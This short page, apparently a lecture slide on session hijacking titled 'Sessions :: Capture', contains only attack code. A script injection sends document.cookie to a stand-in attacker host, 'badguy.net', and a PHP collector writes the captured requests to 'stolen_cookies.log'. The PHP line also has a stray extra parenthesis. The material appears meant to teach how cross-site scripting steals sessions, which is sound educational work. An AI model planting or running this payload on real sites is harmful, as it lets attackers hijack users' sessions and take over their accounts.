Sessions :: Capture

Sessions :: Capture

  1. <script>
  2. var x = new Image(); x.src = 'http://badguy.net/x.php?steal=' + document.cookie;
  3. </script>
  1. $fp = fopen ('stolen_cookies.log', 'a'));
  2. fwrite ($fp, $_SERVER["REQUEST_URI"]);
  3. fclose ($fp);